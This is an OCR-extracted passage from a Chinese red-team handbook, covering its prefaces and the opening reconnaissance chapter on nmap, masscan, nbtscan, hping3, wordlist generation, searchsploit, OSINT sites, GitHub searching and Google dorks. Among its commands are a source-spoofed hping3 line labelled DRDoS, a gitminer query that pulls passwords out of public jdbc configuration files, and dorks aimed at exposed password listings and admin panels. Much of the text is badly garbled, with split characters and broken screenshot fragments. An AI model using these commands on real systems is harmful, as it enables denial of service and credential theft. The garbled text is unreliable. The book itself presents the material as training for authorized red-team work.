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《渗透 攻击 红 队 百科 全 书 》 丛 书 序 言 


保护 好 企业 的 网 络 资产 , 做 好 防护 工作 , 日 益 成 为 了 企业 管理 中 重要 的 任务 。 企 业 和 机 
构 投 入 了 大 量 的 资源 和 精力 ， 部署 了 充分 的 软 硬 件 。 但 由 于 缺乏 黑客 样本 数据 、 不 同业 务 场 
景 用 同一 套 防 护 手段 等 原因 ， 导 致 企业 的 安全 防护 体系 的 效果 并 不 理想 。 

渗透 测试 作为 一 种 安全 防护 手段 , 让 安全 防护 从 被 动 转换 成 主动 , 正 被 越 来 越 多 企业 及 
机 构 认 可 , 但 也 仅 限于 是 防护 基础 工作 之 一 ,代表 企业 网 络 系统 正 合法 合 规 的 运行 着 。 然 而 
企业 的 业务 场景 是 动态 变化 的 ， 黑 客 的 攻击 手法 、0day 漏洞 更 是 层出不穷 ， 红 蓝 队 对 抗 便 
是 针对 此 方面 的 测试 。 

红 蓝 队 对 抗 是 以 红 队 模拟 真实 攻击 , 蓝 队 负责 防御 , 最 终 的 结果 是 攻防 双方 都 会 有 进步 。 
红 蓝 队 对 抗 能 挖掘 出 渗透 测试 中 所 没 注意 到 风险 点 , 并 且 能 持续 对 抗 , 不 断 提升 企业 系统 的 
安全 防御 能 力 , 红 队 的 主要 价值 在 于 能 够 检测 网 络 安全 纵深 防护 能 力 、 应 急 响 应 手段 是 否 有 
效 、 以 及 清楚 的 了 解 高 级 攻击 或 高 级 持续 性 威胁 (Advanced Persistent Threat,APT) 产 生 的 最 大 
危害 ， 从 而 帮助 企业 强化 防护 能 力 、 完 善 应 急 响 应 手段 、 引 导 正 确 的 安全 建设 方向 。 

本 书 便 是 结合 在 模拟 攻击 过 程 中 , 尽 可 能 全 面 测试 整个 企业 的 网 络 系统 , 红 队 攻击 手法 
更 复杂 ， 而 攻击 路 径 的 覆盖 率 更 高 。 通 过 黑客 视角 ， 自 动 化 的 发 起 大 规模 、 海 量 节点 的 实战 
攻击 ， 以 便 测 试用 户 在 各 个 业务 场景 的 应 急 响 应 能 

参与 本 书 的 编撰 团队 来 自 于 多 年 从 事 一 线 攻 防 演练 的 实战 团队 , 历经 上 海 世博 会 、 历 届 
世界 互联 网 大 会 、620 杭州 峰会 、 历 届 中 国 进口 博览 会 、 第 七 届 世 界 军人 运动 会 等 国家 重大 
活动 的 网 络 信息 安全 保障 工作 。 从 实战 角度 出 发 ， 引 导读 者 在 掌握 网 络 空间 攻防 技术 原理 的 
基础 上 ， 通 过 动手 实战 ， 强 化 网 络 空间 攻防 实践 能 力 。 本 书 内 容 系统 、 全 面 的 贯穿 了 网 络 空 
间 攻 防 所 涉及 的 主要 理论 知识 和 应 用 技术 ， 并 涵盖 了 网 络 空间 攻防 技术 发 展 的 新 研究 成 果 ， 
力求 使 读者 通过 本 书 的 学 习 既 可 以 掌握 网 络 空间 攻防 技术 ， 又 能 够 了 解 本 学 科 新 的 发 展 方 
向 。 既 可 作为 高 等 学 校 网 络 空间 安全 和 信息 安全 等 相关 专业 本 科 生 及 研究 生 的 辅助 教材 ,也 
可 作为 从 事 网 络 与 信息 安全 工作 的 工程 技术 人 员 和 网 络 攻防 技术 爱好 者 的 学 习 参 考 读物 。 
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作者 序言 


红 队 (RedTeam) 区 别 于 传统 的 渗透 测试 ， 更 偏向 于 实战 ， 面 对 的 场景 也 更 加 复杂 、 技 
术 繁 多 ， 以 目的 为 导向 ， 需 要 有 能 够 解决 突 发 问题 的 能 力 。 如 何 能 汇总 红 队 方方面面 的 技能 
一 直 以 来 是 一 个 难题 , 安 恒 信息 服务 团队 成 立 了 专门 面向 红 队 任务 的 战略 支援 部 后 , 在 战略 
支援 部 团队 成 员 的 精心 设计 下 , 完成 了 内 部 红 队 知识 库 的 构建 , 并 吸引 整个 服务 团队 越 来 越 
多 技术 专家 加 入 进来 ， 共 同 完善 知识 库 的 内 容 ， 再 到 后 来 ， 公 司 研 究 院 、 研 发 部 门 、 技 术 部 
门 、 培 训 部门 等 技术 专家 也 开始 加 入 进来 ,公司 各 个 团队 的 技术 人 员 在 这 里 毫 无 保留 的 分 享 
各 自 的 心得 体会 , 诡秘 技巧 。 这 里 特别 感谢 战略 支援 部 木 牛 实验 室 小 伙伴 在 侯 亮 部 长 的 带领 
下 辛苦 付出 构建 的 平台 , 也 要 感谢 公司 其 他 各 个 实验 室 和 所 有 技术 人 员 的 大 力 支持 , 没有 大 
家 的 协同 努力 ， 也 就 不 会 有 这 本 书 的 诞生 。 

本 书 是 由 大 量 的 红 队 测试 过 程 、 思 想 ， 和 一 些 非 正式 的 报告 所 组 成 ,可 能 是 业内 所 有 的 
安全 书籍 中 最 不 像 书 的 书 ， 风 格 不 回 定 ， 方 向 也 没有 那么 聚焦 ， 没 有 有 太 多 理论 基础 ， 也 没 
有 引人入胜 的 行文 技巧 ,但 应 该 是 实战 性 最 好 ,价值 含量 最 高 ， 红 队 技 术 维度 覆盖 最 全 ， 作 
者 最 多 的 一 本 书 。 这 本 书 ， 凝 聚 了 安 恒 信息 绝 大 部 分 擅长 渗透 测试 、 安 全 研究 、 红 队 行 动 、 
红 队 武器 、 逆 向 分 析 、 代 码 分 析 等 技术 方向 的 专家 知识 精华 ， 相 信 一 定 会 对 您 有 所 帮助 。 

安 恒 信息 是 以 攻防 技术 起 家 ， 在 对 抗 过 程 中 成 长 ， 一 路 走 到 今天 的 安全 企业 ,我 们 专 精 
于 网 络 攻防 的 两 端 , 致力 于 安全 能 力 的 汇聚 与 持续 提升 。 对 于 安全 技术 的 尊重 和 信仰 是 每 一 
个 安 恒 人 必 备 的 素质 。 在 未 来 每 一 年 的 年 中 ,我 们 都 会 将 上 一 年 的 知识 库 精 华 汇聚 成 册 ， 把 
我 们 在 网 络 安全 技术 各 个 方向 上 的 知识 积累 分 享 给 业内 的 各 位 专家 、 伙伴 、 朋 友 ， 尽 其 所 能 
的 为 网 络 安全 技术 的 知识 分 享 尽 一 份 绵薄 之 力 。 
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红 蓝 对 抗 、 实 战 攻防 演练 是 近 几 年 安全 行业 的 热门 名 词 ， 国 家 相关 部 门 牵头 安全 厂商 大 
力 推动 实战 攻防 演练 , 以 促进 国家 关键 基础 设施 及 重要 行业 的 安全 建设 。 以 攻 促 防 从 传统 渗 
透 测 试 的 视角 转向 前 卫 的 红 队 评 估 , 新 的 概念 和 模型 不 断 频 出 , 从 高 级 可 持续 威胁 (Advanced 
Persistent Threat,APT) 到 网 络 攻击 杀伤 链 〈Cyber Kill Chain) ~ MITRE ATT&CK， 无 不 向 我 们 
展示 了 ， 实 战 是 检验 安全 防护 能 力 、 建 设 安全 防护 体系 的 最 有 效 方法 。 

我 们 在 与 用 户 长 时 间 的 交流 中 了 解 到 , 应 对 纷繁 的 网 络 攻击 , 网 信 信 息 安全 从 业者 一 直 
在 寻找 一 本 紧 跟 技术 前 沿 、 覆盖 面 广 、 贴 合 实战 的 网 络 信息 安全 从 业 人 员 读物 ， 能 快速 提升 
读者 解决 核心 问题 的 能 力 ,撰写 一 本 理论 论述 体系 化 、 技术 论述 细致 化 、 操作 论述 实战 化 的 
书籍 就 极为 迫切 。《 渗 透 攻 击 红 队 百科 全 书 》 以 红 队 视角 出 发 ,完整 星 现 红 队 攻击 流程 ， 对 
红 队 攻击 过 程 进行 了 完整 的 梳理 、 归 纳 ， 读 者 能 跟随 作者 的 思路 最 终 到 达 “ 鞠 心 ”， 树 立 完整 
的 渗透 测试 思路 。 本 书 也 细 化 了 实际 操作 中 过 到 的 各 类 技术 点 , 无 论 是 常见 的 基础 内 容 还 是 
较 冷门 的 知识 点 ， 都 做 了 详尽 的 介绍 ， 可 以 作为 随手 读物 ， 遇 到 不 解 的 情况 下 能 快速 寻找 到 
所 需 技术 知识 。 

《渗透 攻击 红 队 百科 全 书 》 是 根据 安 恒 信息 多 年 的 技术 沉淀 积累 ,并 结合 最 新 最 前 沿 技 
术 编 写 而 成 。 本 书 根据 红 队 测试 的 不 同 阶段 进行 目录 划分 ， 讲述 红 队 的 方方面面 从 信息 收 
集 、 外 网 入 口 点 突破 、 内 网 穿 透 、 内 网 侦 测 、 防 护 绕 过 、 权 限 提升 、 横 向 拓展 ， 覆 盖 了 红 队 
测试 流程 的 各 个 环节 和 技术 点 归纳 ， 可 以 作为 信息 安全 红 队 方向 的 百科 全 书 、 备 忘 录 。 每 一 
章节 内 的 各 个 节点 都 依据 真实 的 网 络 环境 出 发 ， 贴 合 实 操 情况 ， 以 理论 为 基础 ， 从 实际 渗透 
出 发 ， 对 每 个 知识 点 进行 剖析 讲解 ， 由 浅 入 深 。 不 仅 对 技术 内 容 做 了 详尽 介绍 ， 还 有 实 操 过 
程 和 实际 网 络 环境 的 完整 描述 ， 实 用 性 极 强 的 ， 对 于 安全 渗透 测试 人 员 十 分 适用 。 看 完 的 感 
受 ， 既 有 知识 面 的 广度 ， 也 有 针对 每 个 技术 点 的 深度 ， 贯 穿 红 队 渗透 的 点 线 面 各 个 维度 。 

希望 本 书 的 读者 ， 在 56、 大 数据 、 人 工 智能 时 代 来 临 之 际 ， 学 到 一 身 扎 实 的 技术 ， 为 
做 新 时 代 信息 安全 从 业者 打 好 基础 。 
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简介 


近年 来 , 许多 企业 在 网 络 安全 建设 环节 , 对 于 云 安 全 、 外 网 安全 等 这 些 偏向 外 部 安全 威 
胁 的 安全 建设 落地 的 比较 完善 , 但 内 网 安全 、 物 理 安全 、 人 员 安 全 这 些 偏 向 内 部 安全 威胁 的 
建设 往往 会 比较 薄弱 。 

随 着 红 队 概念 的 普及 , 许多 大 型 企业 都 开始 建立 自己 的 红 队 与 蓝 队 ,并 且 会 定期 的 举行 
红 蓝 对 抗 来 检验 自身 网 络 安全 建设 的 问题 ,通常 红 队 在 外 部 进攻 的 方式 选择 上 相对 于 以 往 的 
黑客 攻击 技术 较为 丰富 ， 一 次 红 队 行动 可 以 说 是 合法 的 高 级 持续 性 威胁 (Advanced Persistent 
Threat,APT)， 首 先 ， 他 们 有 着 明确 的 目标 ， 为 了 实现 目标 他 们 分 工 明确 ， 对 攻击 与 利用 的 自 
动 化 程度 很 高 。 

红 队 的 主要 价值 在 于 能 够 检测 网 络 安全 纵深 防护 能 力 、 应 急 响 应 手段 是 否 有 效 、 以 及 清 
楚 的 了 解 APT 产生 的 最 大 和 危害， 从 而 帮助 企业 强化 防护 能 力 、 完 善 应 急 响 应 手段 、 引 导 正 
确 的 安全 建设 方向 。 

本 书 整 理 了 关于 红 队 的 工作 的 技术 点 , 浅显 的 带 读 者 认识 , 红 队 的 技术 碰 到 内 部 网 络 相 
关 的 安全 问题 将 会 碰撞 出 怎样 的 火花 ? 我 们 通过 红 队 的 概念 来 了 解 红 队 的 定义 , 后续 结 合 红 
队 的 工作 周期 来 概括 一 些 实战 案例 ， 本 书 的 全 部 内 容 适 用 于 管理 人 员 、 技 术 人 员 、 工 程 师 、 
计算 机 爱好 者 。 实 战 案例 中 会 将 红 队 工作 周期 的 理论 体现 的 更 加 具象 化 , 让 读者 能 够 理解 的 


深刻 。 
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编者 语 


《渗透 攻击 红 队 百科 全 书 》 分 为 上 、 中 、 下 三 册 , 近 30 万 字 ， 文 中 出 现 笔 误 或 者 不 对 的 
地 方 ， 请 大 家 多 多 包涵 并 反馈 指正 ， 所 有 课程 从 基础 开始 (包括 工具 的 介绍 、 应 用 等 ， 由 于 
是 基础 开始 ， 部 分 内 容 可 能 会 涉及 初级 知识 点 ， 请 见谅 ) ， 这 样 以 后 新 来 的 同事 或 者 想 要 自 
我 从 头 学 习 的 同事 也 可 以 避 开 一 些 弯路 。 在 编写 的 过 程 中 , 我 深 深 体 会 到 分 享 者 才 是 学 习 中 
的 最 大 受益 者 ， 由 于 需要 成 书 ， 所 以 需要 查阅 大 量 的 资料 。 在 整个 过 程 中 ,又 学 习 到 很 多 知 
识 点 ， 其 中 包括 穿插 在 工作 项 目 中 的 心得 笔记 ， 包 括 但 不 限制 于 代码 审计 、Web 安全 渗透 
测试 、 内 网 渗透 测试 、 域 渗透 测试 、 隧 道 技术 、 日 志 溯源 与 暴力 渊源 等 。 如 果 有 课程 指定 需 
求 介绍 相关 技术 的 同事 (在 笔者 团队 技术 能 力 范围 之 内 都 可 以 留言 于 我 ), 笔者 相信 有 一 天 ， 
您 会 发 现 原来 弄 清 事物 的 本 质 是 这 样 的 有 趣 。 愿 读者 学 有 所 成 、 问 有 所 得 、 静 有 所 思 ， 而 私 
f PB 
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第 一 章 信息 搜集 


e Macos: brew install nmap 
e Centos: yum install nmap 
e Ubuntu: apt-get install nmap 


手册 : 


扫描 方式 


« TCP :-sT 
SYN : -SS 
。 ACK: -SA 
e UDP : -sU 
EURPC : -SR 
e ICMP: -SP 
e Disable Port Scan: -Sn 


常见 扫描 方案 


。 扫描 10000 端 口 、 操 作 系统 、 版 本 


nmap -T4 -A <Target> 


。 版 本 探测 


nmap -sV <Target> 


。 操作 系统 


nmap -0 <Target> 


其 他 技巧 


* --host-timeout 主机 超时 时 间 通常 选 值 : 18000 
e -scan-delay 报 文 时 间 间 隔 通常 选 值 : 1000 
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+ -S < 源 地 址 > 定义 扫描 源 地 址 ， 为 了 不 被 发 现 
示例 


nmap -v -iR 100000 -P9 -p 80 


host -1 company.com | cut -d -f 4 | nmap -v -iL - 


输出 


* -ON «File» 
* -OX «XML File» 


e -0G <filespec> 


$ sudo nmap -0 -oG - 10.1.1.100 


Host: 10.1.1.100 (devbox.corp.foocorp.biz) 
Ports: 80/open/tcp//http///, 
135/open/tcp//msrpc///, 
| 139/open/tcp//netbios-ssn///, 
| 443/open/tcp//https///, 
| 445/open/tcp//microsoft-ds///, 
|] 1025/open/tcp//NFS-or-IIS///, 
| 2105/open/tcp//eklogin///, 
| 3389/open/tcp//ms-term-serv/// 
Ignored State: closed (1638) 
OS: Microsoft Windows Millennium Edition (Me), 
Windows 2000 Professional or Advanced Server, 
or Windows XP|Microsoft Windows XP SP1 
Seq Index: 22972 
IPID Seq: Incremental 





了 4 


$ sudo nmap 


Host: 10.1.1 
Host: 10.1.1 
Host: 10.1.1 
fost. 10.1.1 
Host: 10.1.1 
Host: 10.1.1 

masscan 

项 目地 址 : 

安装 : 


-0G 


.168 
.169 
7170 
qa bya 
2 
.173 





- -sP 10.1.1.172/29 


(alice.corp.foocorp.biz) Status: Up 
(madhat-sun.corp.foocorp.biz) Status: Up 
(madhat.corp.foocorp.biz) Status: Up 
(madhat-laptop.corp.foocorp.biz) Status: Up 
(iss-scanner.dal.foocorp.biz) Status: Up 
(hatta.corp.foocorp.biz) Status: Up 


$ sudo apt-get install git gcc make libpcap-dev 
https://github.com/robertdavidgraham/masscan 


$ git 


$ 


$ make 


高 级 选项 


:~# masscan --ports 1-10000 192.168.117.130 --adapter-ip 192.168.117.1 


masscan 


Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2019-04-29 03:50:55 GMT 


forced 
Initiating 
Scanning 1 
Discovered 
Discovered 
Discovered 
ibit || 


options: 


-sS -Pn -n --randomize-hosts -v --send-eth 


SYN Stealth Scan 

hosts [10000 ports/host] 

open port 135/tcp on 192.168.117.130 
open port 445/tcp on 192.168.117.130 
open port 139/tcp on 192.168.117.130 





定 发 包 的 IP 地 址 


。 --adapter-ip 指 


。 --adapter-port 指定 发 包 的 源 端 口 
* --adapter-mac 指定 发 包 的 源 MAC 地 址 
e --router-mac 指定 网 关 的 MAC 地 址 
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e --exclude IP 地 址 范围 黑 名 单 ,防止 masscan 扫 描 
e --excludefile 指定 IP 地 址 范围 黑 名 单 文件 

。 --includefile,-iL 读 取 一 个 范围 列表 进行 扫描 

。 -wait 指定 发 送 完 包 之 后 的 等 待 时 间 , 默 认为 10 秒 


root@kali: ~ eoo 





le £ iew <$ ch Terminal Heip 
# nbtscan 





sion 1.5.1. Copyright (C) 1999-2003 Alla Bezroutchko 
a free software and it comes wi absolutely no warranty 
use, distribute and modify it under terms of GNU GPL 


Usage 
Abtscan v} í e] [ eout] [-b bandwidth] [-r] [-q] {-s [a E ( filename) |{<sean range> 
verb output. Print all names received 
from each host 
dump packets. Print whole 
Format tput in /etc/ 
Fo in lmhosts 
Cannot be 4 th 
t timeout wait timeout millisecon 
Default 1000 
b bandwidth tput throttling. Slow down output 
so that it uses no more that bandwidth bps 


Useful on slow Links sO that ougoing queries 
don't get dropped 


use local port 137 for scar n95 boxe 
nd to this only 
eed to be root to use s option on Unix 
q Suppress banners and error sages, 
5 separator Script-friendly output. Don't print 
column and record headers, separate fields with separator 
Print human-readable na for services 
Can only be used with -v option 
m retransmits Number of retransmits. Default 0 
f filename Take IP addresses to scan from file filena 
f makes nbtscan take IP addresses from 
<scan range> what to scan. Can either be single IP 
like 192,168.1.1 or 
range of addresses in one of two forms 


XXX. KKK XXX. XXX/XX OF XXX.XXX, XXK. XXX 


在 Kali Linux 中 已 经 安装 : 


$ whereis nbtscan 
nbtscan: /usr/bin/nbtscan /usr/share/man/mani/nbtscan.1.gz 
$ nbtscan 


Usage: 
nbtscan [-v] [-d] [-e] [-1] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] 


nbtscan 示例 


16 


:~ nbtscan -v -s3: 192.168.117.130 
.117.130:WIN- PKACSD7SHQL : 20U 
.117.130:WIN- PKACSD7SHQL : 00U 
.117.130:WORKGROUP : 00G 
.117.130: WORKGROUP ; leG 


.117.130:WORKGROUP : 1dU 

.117.130: MSBROWSE :01G 

.117.130:MAC:00:0c:29:06:75:2f 
:~# ^C 


D d 


nbtscan -r 192.168.1.0/24 





e 


nbtscan 192.168.1.25-137 


e 


nbtscan -v -s : 192.168.1.0/24 


€ 


€ 


nbtscan -f «File» 


高 级 用 法 


$ nbtscan -v -s 192.168.117.130 
192.168.117.130 WIN-PKACSD7SHQL 20U 
192.168.117.130 WIN-PKACSD7SHQL 00U 


192.168.117.130 WORKGROUP 00G 
192.168.117.130 WORKGROUP 1eG 
192.168.117.130 WORKGROUP 1dU 


192.168.117.130 MSBROWSE 01G 

192.168.117.130 MAC 00:0c:29:06:75:2f 

$ nbtscan -v -s 192.168.117.130 | awk | unig 
192.168.117.130 








root @kali: ~ 
File Edit View Search Terminal Help 


h 


foptions] 


sion 
count 
interval wait ( icroseconds, example -i u10080) 
fast alias fc i u10000 (10 pack ; for second) 
faster alias 960 (100 pack for ond) 
flood sent p ots as fast as possible. Don't show replies 
numeric numeric output 
quiet quiet 
interface interface name (otherwi default routing interface) 
yerbose verbase made 
tebug i info 
bind 
unbind 
beep 


UDP mode 
SCAN mode 
Exe 1 inc 1-30,70-90 -* target.h 


spoof 
rand-dest random de Lonatior ss mode see the man 
urce random source address mode. see the man 
ttl (default 64) 
id efault random) 
winid use win* id byte ordering 
rel relativize id field (to estimate host traffic) 
frag split packets in more frag (may pë k acl) 
morefrag more fra s flag 
dontfrag don't fragment flag 
fragoff the fragment offset 
mtu set virtual mtu, implies frag if packet size > mtu 
tos type of servi (default 0x00), try tos help 


常用 模式 


-0 --rawip IP 原 始 报 文 
。 -1 --icmp ICMP 模 式 
。 -2 --udp UDP 模 式 

。 -8 --scan 扫描 模式 

。 -9 --listen 监听 模式 





$ hping --scan 1-30,70-90 -S www.target.host 
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# hping3 --scan 445,135 -S 192.168.117.130 
scanning 192.168.117.130 (192.168.117.130), port 445,135 
Bones to scan, use -V to see all the replies 


keel id 
十 = 一 -= 站- x 
445 microsoft-d: .S..A... 128 14607 8192 
135 LOC- Sry Ee T Sk Or LAGOS Gl oo 
All replies received. Done. 
Not responding ports: 
: -# i 





可 以 看 到 ， 目 标 主机 回复 了 : S..A， 代 表 SYN/ACK 


$ hping3 -S -a 114.114.114.114 -p 53 114.114.114.114 -c 5 


DRDDOS 


$ hping3 --udp -a 114.114.114.114 -p 53 114.114.114.114 -c 5 
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关联 信息 生成 


在 渗透 前 期 工作 开展 之 前 ， 需 要 对 目标 的 各 种 信息 进行 分 析 、 拆 分 、 组 合 。 
例如 : 赫 尔 巴 斯 亚 基 国 
根据 地 域 习 惯 、 宗 教 、 互 联网 开放 信息 等 信息 进行 简要 拆 分 ， 假设 获取 的 信息 如 下 : 


。 当地 人 爱好 吃 橙子 

。 当地 人 信奉 伊斯兰 教 

。 IPV4 地 址 开放 IP 段 

。 相关 社交 网 络 公开 的 数据 库 


根据 宗教 、 习 惯 、IP 地 址 、 开 放 数 据 支持 …… 等 ， 为 后 续 的 字典 生成 、 鱼 又 、 水 坑 攻 击 铺 下 基石 。 


字典 生成 





$ git https://github.com/LandGrey/pydictor 


Git# git clone https://github.com/LandGrey/pydictor 
Cloning into 'pydictor' 
remote: Enumerating objects: 828, done. 
remote: Total 828 (delta 0), reused 0 (delta 0), pack-reused 828 


Receiving objects: 100% (828/828), 23.56 MiB | 403.00 KiB/s, done. 
Resolving deltas: 100% (493/493), done. 
/Git# | 
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t# git clone https: //github, com/LandGrey/pydictor 
pydictor' 
)bjects: 828, done 
Tot: elta 0), reused 9 (delta 0), pack-reused 828 
g objects: 100% (828/828}, 23.56 MiB | 403.06 KiB done. 
(493/493), 
ictor/ 
ts 
LICENSE ) 1 pydictor.py README CN.md README.md 
python pydictor.py 


2.1.1#dev 


pydictor. py {options} 
base [type] 
[custom c ] 
[chunk1] [chunk2] 
[string or file] 
{[scratch, birthday, pid8, pid6, pid4, ftp] 
[expression or file] 


-o,--output [directory] 
tool [combiner, comparer, unigifer,hybrider, uniqbiner, shredder, counter,handler] 
len Iminlen] [maxlen] 


head [prefix string] 
tail (suffix string] 
[none, shal, sha512,b64,url,md516,des,rsa,b32,b16, test, sha256,execjs,hmac,md5} 
ur [tetter] [digital] [special] 
-types [letter) [digital] [special] 
--regex [regex] 
--level [code] 
--leet [code] 


Show this help sage and exit 





快速 使 用 : 


$ python pydictor.py --sedb 
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2.1.14dev root @kali: Jusr/share/wordlists 


Social Engineering Dictionary Builder 


oot/Git/pydictor/results/sedb 043658. txt 
0.3658 second 





。 合并 去 重 


$ python pydictor.py -tool uniqbiner /my/all/dict/ 


。 多 字典 文件 组 合 工 具 


$ python pydictor.py -tool hybrider heads.txt some_others.txt tails.txt 
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earchsploit 


ive search (Default i 
on exploit title (Defau 


screen, 
N format. 
copies) an exploit to the current working directory. 
tles are allowed to overflow their colui 
th to an exploit (and also copies the path to the clipboard if possible) 
JUST ee t title (Default is title AND the file's path). 
Check for and in any exploitdb package updates (d or git). 
Show URLs to Exptoit-DB.com rather than the local path. 
Examine (aka opens) the exploit using $PAGER 
Disable colour highlighting in search results. 
Display the EDB-ID value rather than local path 
Checks all results in Nmap's XML output with service version (e.g.: nmap -sV -oX file.xml). 
Use v" (verbose) to try even more combinations 
Remove values from results. By using "|" to separated you can chain multiple values. 
e.g exclude-"terml|term2|term3". 


Note 
* You can use any number of search terms 
Search terms are not cë sensitive (by default), and ordering is irrelevant. 

Use '-c if you wish to reduce results by case-sensitive searching. 

And/Or e' if you wish to filter results by using an exact match. 

se t' to exclude the file's path to filter the search results. 

Remove fal positives (especially when searching using numbers - e. versions). 
When updating or displaying help, search terms will be ignored. 


示例 


。 搜索 Windows 提 权 漏 ; 








$ searchsploit -t windows local 


Overflow (Hardware DEP) 


MIME 
h Path 

ng Slash Path 
stash Par 
tash Path 


Bypass 
PHE exe’ Remote 
Local Buffer 
Debian 1T ivilege Escalation 
Heade 


Directory Access 
d Encoding Denial of 

HYDigest Realm Command L Argument Buffer Overflow (1) 

HIDigest Realm Command Line Argument Buffer Overflow (21 
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BOE B 


源 情报 信息 搜集 (OSINT) 
情报 信息 搜集 (OSINT) 


~~ è " Ņ e 


g baidu.com/index/getRelatedSites?site_address=baidu.com 
.webscan.cc/ 
;Ximcx.cn/ 
ys.io/certificates?q-.example.com 
/?9-9625.example.com 
b.com/cOny1/WorkScripts/tree/master/get-subdomain-from-baidu 
umpster.com/ 
ithreatcrowd.org/searchApi/v2/domain/report/?domain=baidu.com 
idsubdomains.com/ 
ics.com/search?q=www.baidu.com 
intest-tools.com/information-gathering/find-subdomains-of-domain 
dns.info/ 
yw. ipneighbour.com/#/lookup/114.114.114.114 
ritytrails.com/list/apex domain/baidu.com 


ackertarget.com/hostsearch/?q=baidu.com 
yunsee.cn/finger.html 


EL : ae i 
Ihub:com/rshipp/awesome-malware-analysis/blob/master/5 I A CF 23 fr X & S. mirik 


25 


DNS 历史 解析 记录 
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Github Hacking 


您 可 以 在 所 有 公共 GitHub 存 储 库 中 搜索 以 下 类 型 的 信息 ， 以 及 您 有 权 访 问 的 所 有 私有 GitHub 存 储 
库 : 


e Repositorie: , 
e Topics 

e issues ant 

e Code 

e Commits 

e Users 

e Wikis 


BE: 


e Searching f 
e Searching ti 


e Searc 





e Searc 






e Searchinc 


e Searc 
BFA Tm c nmmisgzxiHub. 
您 可 以 使 用 >, >=, <, M <= 搜索 是 大 于 ， 大 于 或 等 于 ， 小 于 和 小 于 或 等 于 另 一 个 值 的 值 。 


搜索 仓库 


Query Example 
2n. vats stai 匹配 关键 字 "cats" 且 star 大 于 1000 的 仓库 
>=_n_ | 匹配 关键 字 "cats" 且 标签 数量 大 于 等 于 5 的 仓库 
eh cats size:<10000 匹配 关键 字 "cats" 且 文件 小 于 10KB 的 仓库 
pn --50 匹配 关键 字 "cats" 且 star 小 于 等 于 50 的 仓库 
= 匹配 关键 字 "cats" 且 star 大 于 等 于 10 的 仓库 
En 匹配 关键 字 "cats" 且 star 小 于 等 于 10 的 仓库 
n..n 匹配 关键 字 "cats" 且 star 大 于 10 且 小 于 50 的 仓库 
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Query Example 


Bust ta 匹配 关键 字 "cats" 且 star 大 于 等 于 10 的 仓库 
See 匹配 关键 字 "cats" 且 star 小 于 等 于 10 的 仓库 


n..n 50 匹配 关键 字 "cats" 且 star 大 于 10 且 小 于 50 的 仓库 


以 下 搜索 语法 与 上 面 差不多 ， 故 此 不 贴 表格 了 。 


搜索 代码 
注意 事项 


。 只 能 搜索 小 于 384 KB 的 文件 。 

只 能 搜索 少 于 500,000 个 文件 的 存储 库 。 

登录 的 用 户 可 以 搜索 所 有 公共 存储 库 。 

BR filename 搜索 外 ， 搜 索 源 代码 时 必须 至 少 包含 一 个 搜索 词 。 例 如 ， 搜 

索 language:javascript 无 效 ， 而 是 这 样 : amazing language:javascript o 

搜索 结果 最 多 可 以 显示 来 自 同 一 文件 的 两 个 片段 ， 但 文件 中 可 能 会 有 更 多 结果 。 

您 不 能 将 以 下 通配符 用 作 搜 索 查 询 的 一 部 分 : 2, :; AN SEGRA] 
> ( ) { } [ ] 。 搜 索 将 忽略 这 些 符号 。 


日 期 条 件 


cats pushed:«2012-07-05 搜索 在 2012 年 07 月 05 日 前 push 代 码 ， 且 cats 作 为 关键 字 
cats pushed:2016-04-30..2016-07-04 日 期 区 间 
cats created:»-2017-04-01 创建 时 间 


逻辑 运算 


AND, OR. NOT 


排除 运算 


cats pushed:<2012-07-05 -language:java 搜索 在 2012 年 07 月 05 日 前 push 代 码 ， 且 cats 作 为 
关键 字 ， 排 除 java 语言 仓库 。 


包含 搜索 


cats in:file 搜索 文件 中 包含 cats 的 代码 
cats in:path 搜索 路 径 中 包含 cats 的 代码 
cats in:path,file 搜索 路 径 、 文 件 中 包含 cats 的 代码 
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console path:app/public language:javascript 搜索 关键 字 console， 且 语言 为 javascript， 
在 app/public 下 的 代码 


主体 搜索 


user:USERNAME 用 户 名 搜索 
org: "ORGNAME 组 织 搜索 
repo:USERNAME/REPOSITORY 指定 仓库 搜索 


文件 大 小 


size:>1000 搜索 大 小 大 于 1KB 的 文件 


文件 名 称 


filename:config.php language:php 搜索 文件 名 为 config.php， 且 语言 为 php 的 代码 


例如 搜索 Java 项 目 配置 文件 : mail filename: .properties 






Pull requests issues Marketplace Explore 


Showing 709,272 available code results 


扩展 名 


extension:EXTENSION 指定 扩展 名 搜索 


例如 : extension:``properties jdbc 


仅 供 技术 研究 ! 
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自动 化 工具 


o + 
¢ } extension properties idee Pull requests issues Marketplace Explore 
1,193,098 code results " 
M 


python3 gitminer-v2.0.py -c cookie.txt -q 'extension:properties jdbc' -r 
'password(.*)' -m passwords 
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itomatic search for GitHub. 


unkl4b.github.10 
github. com/UnkL4b 


[WARNING ] 
DEVELOPERS ASSUME NO LIABILITY AND ARE NOT 
RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY 
THIS PROGRAM 


ptional arguments: 
help show this help message and exit 
, query 
Specify search term 


module 
Specify the search module 
List modules 

output 
Specify the output file where it will be 
saved 
: regex 
Set regex to search in file 
txt, --cookie | 





[WARNING 
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Google Hacking 





intitle: "index of /"| D 


intitle index of / mp3 

intitle index of / mp4 

intitle index of / msvcr100.dll 
intitle index of / password 
intitle index of / software 

intitle index of / admin 

intitle index of / pdf 

intitle index of / bitcoin / 

intitle index of / inurl passport 
intitle index of / passport 


Google Search I'm Feeling Lucky 
N 
通配符 
通配符 语义 说 明 示例 

d 包含 关键 词 + 前 面 必 须要 有 一 个 空格 admin +login 
排除 关键 词 -前 面 必须 要 有 一 个 空格 mysql -csdn 
E 同义词 -前 面 必须 要 有 一 个 空格 mysql -csdn 
P 模糊 查询 * 代 替 任 意 字符 mysql** 
E 强调 - "mysql" 


高 级 语法 


语法 :语句 ; Xu 
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intitle 包含 标题 
intext 包含 内 容 
filetype 文件 类 型 


a : T D. 
info 基本 信息 
site 旨 定 网 站 
inurl 包含 某 个 url 
link 包含 指定 链接 的 网 页 
cache 显示 页 面 的 缓存 版 本 
numberange 搜索 一 个 数字 
示例 
< C © dà bttps www.google.com ® k ce 4 @ & 


[RR Q wine YA RSS 





zum Deum 





Py EHH BY IDC 





AwesomeBigg ES} REF ES} ToolsWeb ES} if TAR FS Paper ES n. 


OG inurl:/admin intext: 后 台 管理 系统 £ 





欢迎 登录 语 台 管理 系统 
www xzbbe com/admin/lagin.aspx v Translate this page 
HPR 


